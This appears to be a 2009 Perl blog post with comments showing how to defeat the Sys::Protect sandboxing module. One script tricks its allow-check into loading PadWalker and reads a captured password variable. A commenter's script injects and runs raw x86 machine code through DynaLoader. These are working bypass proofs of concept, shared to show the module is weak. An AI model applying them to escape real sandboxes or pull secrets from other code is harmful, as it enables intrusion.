All the Perl that's Practical to Extract and Report

Breaking Sys::Protect

sartak on 2009-03-26T02:52:19

Sys::Protect does not bill itself as unbreakable protection, but it's fun to break it anyway.

PadWalker is used as an example of an XS module that could seriously mess with other code.

#!/usr/bin/env perl
no strict;
use warnings;
use Sys::Protect;
use Test::More tests => 1;

XSLoader::load(bless {}, 'Break::Sys::Protect');

my $password = 'c53eb8f992b4fdf70a03a4d437820028';
is(${PadWalker::closed_over(sub { $password })->{'$password'}}, $password);

package Break::Sys::Protect;
use overload q{""} => sub {
    return "Math::BigInt::FastCalc"
        if caller eq 'Sys::Protect';

    $_[0] = "PadWalker";
};

Don't use Sys::Protect. :)

Sys::Protect is too weak :(

tokuhirom on 2009-03-26T03:06:12

hey, user can inject any machine code under Sys::Protect!

use strict;
use warnings;
use Sys::Protect;
use DynaLoader;

my $s = join(
    '',
    "\x31\xc0",    # xor %eax,%eax
    "\xb0\x02",    # mov $0x2,%al
    "\xcd\x80",    # int $0x80
    "\xc3",        # ret
);
DynaLoader::dl_install_xsub( 'myfork', unpack( "L", pack( "P*", $s ) ) );
&myfork;

print "\nforked?\n";

Re:Sys::Protect is too weak :(

sartak on 2009-03-26T03:18:27

Super cool. I also loved your pure-perl DB/inside-out hack. :)